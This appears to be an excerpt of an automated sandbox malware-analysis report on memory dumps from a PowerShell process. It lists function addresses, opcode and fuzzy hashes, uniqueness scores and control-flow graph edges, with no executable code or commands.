                                                                                                                                                                        • Opcode ID: c8b4481abc32f683a7211e6b77103c28d8de4c1fb50a3ef7505587d02512e507
                                                                                                                                                                        • Instruction ID: 566cc5befbf1388da86875df49f5ca45f224ead673baf1339d4481d386f30d84
                                                                                                                                                                        • Opcode Fuzzy Hash: c8b4481abc32f683a7211e6b77103c28d8de4c1fb50a3ef7505587d02512e507
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F914334B102058BDB44EBB5D951B6E7BB7EFC8300F219429E81AAB394DE359C42CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDAC2D Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 71b9c19f0e2350b84b42c5bdd8f94ba978329c9cad913c27a7a8c841d6326f16
                                                                                                                                                                        • Instruction ID: 7ed3ad3b8b7097b00e62da0611dee8b7abffd467230245fb96efa0ee4b271257
                                                                                                                                                                        • Opcode Fuzzy Hash: 71b9c19f0e2350b84b42c5bdd8f94ba978329c9cad913c27a7a8c841d6326f16
                                                                                                                                                                        • Instruction Fuzzy Hash: 67817F74B101008FD745EBA4D851B6FBBBBEBC9310F248129E5169B388DE389D42CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDAC21 Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8982dccb6ef055d7245166e8bcb48bf5fe942b442ecd1db73b5488e5edd34d3d
                                                                                                                                                                        • Instruction ID: 0e8c3b7e26c32284aeed6e4adb9af876c1e1a02a89729346797d28cc7c707bb6
                                                                                                                                                                        • Opcode Fuzzy Hash: 8982dccb6ef055d7245166e8bcb48bf5fe942b442ecd1db73b5488e5edd34d3d
                                                                                                                                                                        • Instruction Fuzzy Hash: F4819274B101008FD745EBA4D851B6FBBBBEBC8310F24816AF4169B388DE389D02CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDAC28 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ecf4724a7feda7b200df0b18f8d7c97fa19bb8f0dc5116615a7ba1fbb6b6e22a
                                                                                                                                                                        • Instruction ID: 9f96cdcf95c37b47195bcdcf77091de5815ff6501c95e4b77fd96105c8c947aa
                                                                                                                                                                        • Opcode Fuzzy Hash: ecf4724a7feda7b200df0b18f8d7c97fa19bb8f0dc5116615a7ba1fbb6b6e22a
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C819175B101008FD745EBA4D855B6FBBBBEBC8300F24816AF4169B388DE389D02CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDAC30 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 42d54e1f339a67f60ccc3e80ad74846fc6263ff39584aada343cbda8aef01f47
                                                                                                                                                                        • Instruction ID: 732c8a519442fd98d8662b5df2ac3dc5c6793be3df004c6b151e50196e0602ba
                                                                                                                                                                        • Opcode Fuzzy Hash: 42d54e1f339a67f60ccc3e80ad74846fc6263ff39584aada343cbda8aef01f47
                                                                                                                                                                        • Instruction Fuzzy Hash: 07818074B101008FD745EBA4D851B6FBBBBEBC8300F248129E5169B388DE389D02CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD0006 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a24f24f4ba9aea974dc28faab23162557448954d08d04ab9868e2afbe0983d34
                                                                                                                                                                        • Instruction ID: 9effd43299a3026f8ef32f88f1ae5ee77a8b587f89b5c1a3018c0b8926e41d9a
                                                                                                                                                                        • Opcode Fuzzy Hash: a24f24f4ba9aea974dc28faab23162557448954d08d04ab9868e2afbe0983d34
                                                                                                                                                                        • Instruction Fuzzy Hash: 4971D335A25104CFE705EFA5D895BAEBBF3EBC5300F2480A6E106A7395DE345C45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD0034 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f94cfa0a0a7843c1723e4b9ce8cfa909e1471eac65dc74a0e822052ef4ba8ff5
                                                                                                                                                                        • Instruction ID: 87b606755af583b3612f584835bcd7bf52cc19178628dc8740bda5d7ef9e08b2
                                                                                                                                                                        • Opcode Fuzzy Hash: f94cfa0a0a7843c1723e4b9ce8cfa909e1471eac65dc74a0e822052ef4ba8ff5
                                                                                                                                                                        • Instruction Fuzzy Hash: FB619035A21104CFEB04EFA5D895BAEBBF3EBC9300F648066E506A7794EE345C45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD0039 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f1f94476d1482d791239d8e359085d5f245dde21e40d24c123675511f6dce70a
                                                                                                                                                                        • Instruction ID: 87cb6ce6e9deca1ce30f38d056211d9750d408e2486158949779b1ce23f79644
                                                                                                                                                                        • Opcode Fuzzy Hash: f1f94476d1482d791239d8e359085d5f245dde21e40d24c123675511f6dce70a
                                                                                                                                                                        • Instruction Fuzzy Hash: C2618035A21104CFEB04EFA5D895BAEBBF3EBC9300F648066E506A7794DE349C45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD0040 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b87490a88d8d1f9eb75cd0b383d51d1429fe7bd264660665214bced7b58a7fca
                                                                                                                                                                        • Instruction ID: 4de23ee2ccba83682c0ac6de0d7a3eae8042c02a7f934046feaf76cf1d2e13d2
                                                                                                                                                                        • Opcode Fuzzy Hash: b87490a88d8d1f9eb75cd0b383d51d1429fe7bd264660665214bced7b58a7fca
                                                                                                                                                                        • Instruction Fuzzy Hash: D7618135A21104CFEB04EFA5D895BAEBBF3EBC9300F648066E506A7794DE345C45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD5C20 Relevance: 4.0, Strings: 3, Instructions: 254COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 bd5c20-bd75b5 3 bd7709-bd772e 0->3 4 bd75bb-bd75bd 0->4 5 bd7735-bd779b 3->5 4->5 6 bd75c3-bd75cc 4->6 39 bd779d-bd77a6 5->39 40 bd77a7-bd7888 5->40 7 bd75df-bd7606 6->7 8 bd75ce-bd75de 6->8 12 bd760c-bd761e call bd71d8 call bd6aa8 7->12 13 bd768f-bd7693 7->13 8->7 12->13 31 bd7620-bd7673 12->31 14 bd76ca-bd76e3 13->14 15 bd7695-bd76c2 call bd71e8 13->15 25 bd76ed-bd76ee 14->25 26 bd76e5 14->26 34 bd76c7 15->34 25->3 26->25 31->13 37 bd7675-bd7688 31->37 34->14 37->13 49 bd788e-bd789c 40->49 50 bd789e-bd78a4 49->50 51 bd78a5-bd78dd 49->51 50->51 55 bd78ed 51->55 56 bd78df-bd78e3 51->56 58 bd78ee 55->58 56->55 57 bd78e5 56->57 57->55 58->58
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (q$(q$(q
                                                                                                                                                                        • API String ID: 0-2705139113
                                                                                                                                                                        • Opcode ID: 869832789b361758d3e5bafc2423f2b3db3928a9bea0b75cea4dca45219838c8
                                                                                                                                                                        • Instruction ID: 182da1d4defc8487425ec287309d89a2c65dd3ee7a29d846bc40a47980a61f2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 869832789b361758d3e5bafc2423f2b3db3928a9bea0b75cea4dca45219838c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 88A17171A046099FCB14DFA9C4546DDFBF1EF88310F24855EE409AB390EB71AD45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8A78 Relevance: 1.7, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 390 bd8a78-bd8ae4 395 bd8aea-bd8afa 390->395 396 bd9257-bd9270 390->396 401 bd8afc 395->401 402 bd8b0f-bd8b33 395->402 398 bd9280 396->398 399 bd9272-bd9278 396->399 403 bd9281 398->403 399->398 401->396 404 bd8b02-bd8b09 401->404 407 bd8b39-bd8b68 402->407 408 bd9234-bd9239 402->408 403->403 404->396 404->402 411 bd9241-bd9251 407->411 415 bd8b6e-bd8b72 407->415 408->411 411->395 411->396 415->411 416 bd8b78-bd8b7c 415->416 416->408 417 bd8b82-bd8b97 416->417 417->408 419 bd8b9d-bd8bc4 417->419 419->408 422 bd8bca-bd8bfb 419->422 422->408 426 bd8c01-bd8c19 422->426 427 bd8c39-bd8c63 426->427 428 bd8c1b-bd8c1f 426->428 434 bd8c69-bd8c93 427->434 435 bd8f82-bd8fbc 427->435 428->408 429 bd8c25-bd8c36 428->429 429->427 434->411 440 bd8c99-bd8ca2 434->440 550 bd8fbf call bd934c 435->550 551 bd8fbf call bd9348 435->551 552 bd8fbf call bd9350 435->552 553 bd8fbf call bd9340 435->553 554 bd8fbf call bd9373 435->554 440->408 442 bd8ca8-bd8d09 440->442 460 bd8d0f-bd8d50 442->460 461 bd8f2e-bd8f47 442->461 443 bd8fc5-bd8fe0 449 bd91ff-bd9218 443->449 450 bd8fe6-bd902a 443->450 454 bd9228 449->454 455 bd921a-bd9220 449->455 469 bd902c 450->469 470 bd903a-bd904b 450->470 454->408 455->454 484 bd8d60-bd8d71 460->484 485 bd8d52 460->485 465 bd8f49-bd8f4f 461->465 466 bd8f57 461->466 465->466 466->435 471 bd91e9-bd91f9 469->471 472 bd9032-bd9034 469->472 475 bd904d 470->475 476 bd905c-bd9060 470->476 471->449 471->450 472->470 472->471 475->471 479 bd9053-bd9056 475->479 480 bd9075-bd90c5 476->480 481 bd9062 476->481 479->471 479->476 503 bd91dc-bd91e1 480->503 504 bd90cb-bd90d5 480->504 481->471 483 bd9068-bd906f 481->483 483->471 483->480 491 bd8d73 484->491 492 bd8d82-bd8d86 484->492 487 bd8f18-bd8f28 485->487 488 bd8d58-bd8d5a 485->488 487->460 487->461 488->484 488->487 491->487 494 bd8d79-bd8d7c 491->494 495 bd8d88 492->495 496 bd8d9b-bd8deb 492->496 494->487 494->492 495->487 498 bd8d8e-bd8d95 495->498 512 bd8f0b-bd8f10 496->512 513 bd8df1-bd8dfb 496->513 498->487 498->496 503->471 504->503 505 bd90db-bd9122 504->505 548 bd9124 call bd978c 505->548 549 bd9124 call bd977f 505->549 512->487 513->512 515 bd8e01-bd8e67 513->515 533 bd8e69-bd8e82 515->533 534 bd8e84-bd8e8a 515->534 521 bd912a-bd913e 523 bd9158-bd915e 521->523 524 bd9140-bd9156 521->524 525 bd9169-bd91da 523->525 524->523 527 bd9160-bd9164 524->527 525->471 527->503 528 bd9166 527->528 528->525 533->534 535 bd8e8c-bd8e90 533->535 536 bd8e95-bd8f09 534->536 535->512 538 bd8e92 535->538 536->487 538->536 548->521 549->521 550->443 551->443 552->443 553->443 554->443
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @B/
                                                                                                                                                                        • API String ID: 0-3863299084
                                                                                                                                                                        • Opcode ID: bd9245bf960461085098e203e6e1c49f3bce9d286fa5e27d930c8f36bd8fe9bb
                                                                                                                                                                        • Instruction ID: 27083b5e5946cba52b8c9f937f896b0cd50fd2e7497f0e949457a81260b3d22d
                                                                                                                                                                        • Opcode Fuzzy Hash: bd9245bf960461085098e203e6e1c49f3bce9d286fa5e27d930c8f36bd8fe9bb
                                                                                                                                                                        • Instruction Fuzzy Hash: C0123934A002048FDB54EFA5D999B6EBBF2EF88300F24856AD41AAB355DF349D41CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BEFE70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 659 befe70-beff31 CreateActCtxA 661 beff3a-beff94 659->661 662 beff33-beff39 659->662 669 beff96-beff99 661->669 670 beffa3-beffa7 661->670 662->661 669->670 671 beffb8 670->671 672 beffa9-beffb5 670->672 672->671
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 00BEFF21
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522957582.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_be0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Create
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                        • Opcode ID: b382ee33c0db96c424f8dd07996a39d6e38748003af22cef1727643b4d19c760
                                                                                                                                                                        • Instruction ID: 7a4f9695f554506d0f309aa7e4247aeb55c95c88c6e67377907dfad69ec60227
                                                                                                                                                                        • Opcode Fuzzy Hash: b382ee33c0db96c424f8dd07996a39d6e38748003af22cef1727643b4d19c760
                                                                                                                                                                        • Instruction Fuzzy Hash: E241D2B1D00659CFDB24CFAAC844BDDBBF6BF89314F20816AD408AB251EB756945CF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9373 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 973 bd9373-bd9374 974 bd934d-bd9362 973->974 975 bd9376-bd944f 973->975 1037 bd9365 call bd95a9 974->1037 1038 bd9365 call bd937b 974->1038 1039 bd9365 call bd95ca 974->1039 1040 bd9365 call bd954a 974->1040 1041 bd9365 call bd9626 974->1041 1042 bd9365 call bd95c1 974->1042 1043 bd9365 call bd9373 974->1043 994 bd95cf-bd95e1 975->994 995 bd9455-bd948e 975->995 979 bd9367-bd9369 996 bd9639-bd9642 994->996 997 bd95e3-bd95ec 994->997 1008 bd958c-bd95ae 995->1008 1009 bd9494-bd94a4 995->1009 999 bd95ee-bd9609 997->999 1000 bd9645-bd964f 997->1000 1033 bd960c call bd969d 999->1033 1034 bd960c call bd9698 999->1034 1035 bd960c call bd96a0 999->1035 1036 bd960c call bd9690 999->1036 1004 bd9612-bd9637 1004->996 1004->997 1013 bd95be 1008->1013 1014 bd95b0-bd95b6 1008->1014 1015 bd94aa-bd94b9 1009->1015 1016 bd9550-bd9586 call bd9350 1009->1016 1013->994 1014->1013 1015->1016 1020 bd94bf-bd9501 1015->1020 1016->1008 1016->1009 1024 bd9503-bd9516 1020->1024 1025 bd9532-bd9548 1020->1025 1030 bd9518-bd951f 1024->1030 1031 bd9521-bd9530 1024->1031 1025->1016 1030->1025 1031->1024 1031->1025 1033->1004 1034->1004 1035->1004 1036->1004 1037->979 1038->979 1039->979 1040->979 1041->979 1042->979 1043->979
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: T8o
                                                                                                                                                                        • API String ID: 0-2079612026
                                                                                                                                                                        • Opcode ID: e588b71101e8813e3e2ee205dd3f67e1fd5125d1af1160b107615593ac9a92cd
                                                                                                                                                                        • Instruction ID: 9493dded70890b3c1837dee1f4fe188f5ae51fe8fa83dd269860d3b56d04e7f9
                                                                                                                                                                        • Opcode Fuzzy Hash: e588b71101e8813e3e2ee205dd3f67e1fd5125d1af1160b107615593ac9a92cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 23815234A002099FDB05DFE4D9515AEBBF2EF84304F20856AE806EB354EB71DD46CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6A40 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1102 bd6a40-bd6a4e 1103 bd6a68-bd6abf 1102->1103 1104 bd6a50 1102->1104 1112 bd6ac8-bd6ad5 1103->1112 1119 bd6ac2 call bd6b48 1103->1119 1120 bd6a50 call bd6a3f 1104->1120 1121 bd6a50 call bd6aa8 1104->1121 1122 bd6a50 call bd6a40 1104->1122 1106 bd6a56-bd6a5d call bd5c20 1109 bd6a62-bd6a65 1106->1109 1113 bd6b39-bd6b42 1112->1113 1114 bd6ad7 1112->1114 1115 bd6ada-bd6b26 1114->1115 1117 bd6b28-bd6b32 1115->1117 1118 bd6b33-bd6b37 1115->1118 1118->1113 1118->1115 1119->1112 1120->1106 1121->1106 1122->1106
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (q
                                                                                                                                                                        • API String ID: 0-2781080665
                                                                                                                                                                        • Opcode ID: 18e071752e13a932459ea26bdeb695b546bf9f1170efb064930aa864dbaa8a93
                                                                                                                                                                        • Instruction ID: a0a0e0c32dc71dfb35c6c53f706965b292b53cfe5a2e74101c6bf0bc08f8e33f
                                                                                                                                                                        • Opcode Fuzzy Hash: 18e071752e13a932459ea26bdeb695b546bf9f1170efb064930aa864dbaa8a93
                                                                                                                                                                        • Instruction Fuzzy Hash: 76318E31E006098FCB00EFA9D8505EEBBF0EF89310B14866BD549F7251EB30A941CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD3218 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1123 bd3218-bd3255 call bd2d74 1127 bd325a-bd325c 1123->1127 1128 bd325e-bd329d 1127->1128 1129 bd32d5-bd3310 1127->1129 1137 bd329f-bd32c8 1128->1137 1138 bd32ce-bd32d4 1128->1138 1137->1138
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 3
                                                                                                                                                                        • API String ID: 0-1842515611
                                                                                                                                                                        • Opcode ID: 3ec5b25faabc1c7e27fd2644310b8e847c6523aadf58f3f0d121abb688f926b2
                                                                                                                                                                        • Instruction ID: 388f2c74643837659a7ff053599f151bd40c438ec882d8694f3b96e0dc6b67a7
                                                                                                                                                                        • Opcode Fuzzy Hash: 3ec5b25faabc1c7e27fd2644310b8e847c6523aadf58f3f0d121abb688f926b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 582137327042404FCB05EB79C80549ABBF6AF81310B1489AED406DB362EB71DD09CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDB540 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1141 bdb540-bdb7be 1172 bdb7c9-bdb7dd 1141->1172 1173 bdb7e7-bdb7e9 1172->1173 1174 bdb7f0 1173->1174 1175 bdb7fa-bdb8b5 1174->1175 1183 bdb8c0-bdb8d4 1175->1183 1184 bdb8de-bdb900 1183->1184 1188 bdbaac-bdbabf 1184->1188 1189 bdb906-bdb9d1 1184->1189 1190 bdbac6 1188->1190 1205 bdb9d7-bdb9ee 1189->1205 1206 bdbac1 1189->1206 1192 bdbac7 1190->1192 1192->1192 1205->1206 1208 bdb9f4-bdbaa6 1205->1208 1206->1190 1208->1188 1208->1189
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: bb68f4f1a36d4a1f911ca1c36209767868b9bb14f8ae7677e27d6df24bf3ed8f
                                                                                                                                                                        • Instruction ID: bfcc0c3cdadb63e1e2a718bc53aca0c0ca4049ecdb100edf54c5e0672e334909
                                                                                                                                                                        • Opcode Fuzzy Hash: bb68f4f1a36d4a1f911ca1c36209767868b9bb14f8ae7677e27d6df24bf3ed8f
                                                                                                                                                                        • Instruction Fuzzy Hash: 22C19374B102158FDB54AB64C851BAEBBB7EFC8300F208069E40AAB395DF755D46CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDB54C Relevance: .3, Instructions: 325COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a2ce62d240f98f053e6d3b0f3f5cdc1e5744c2b0b7c5d45ed162dd1e9cbc3a41
                                                                                                                                                                        • Instruction ID: 3921ef3132f420396e8db652f6c185737bc5f113228cd12b333be4be52c212ac
                                                                                                                                                                        • Opcode Fuzzy Hash: a2ce62d240f98f053e6d3b0f3f5cdc1e5744c2b0b7c5d45ed162dd1e9cbc3a41
                                                                                                                                                                        • Instruction Fuzzy Hash: 19C19274B102158FDB54AB64C851BAEBBB7EFC8300F208069E80AAB395DF755D46CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDB546 Relevance: .3, Instructions: 325COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 23724bfb6895563e8c4bf3836bd655d3f16d6f04b7409480139fd573d990e6f2
                                                                                                                                                                        • Instruction ID: fe669ea6ba98f9b54222f45ee6be5a5667c964fd4b025f187a4d4951843b3320
                                                                                                                                                                        • Opcode Fuzzy Hash: 23724bfb6895563e8c4bf3836bd655d3f16d6f04b7409480139fd573d990e6f2
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AC19274B102158FDB54AB64C851BAEBBB7EFC8300F208069E80AAB395DF755D46CF91
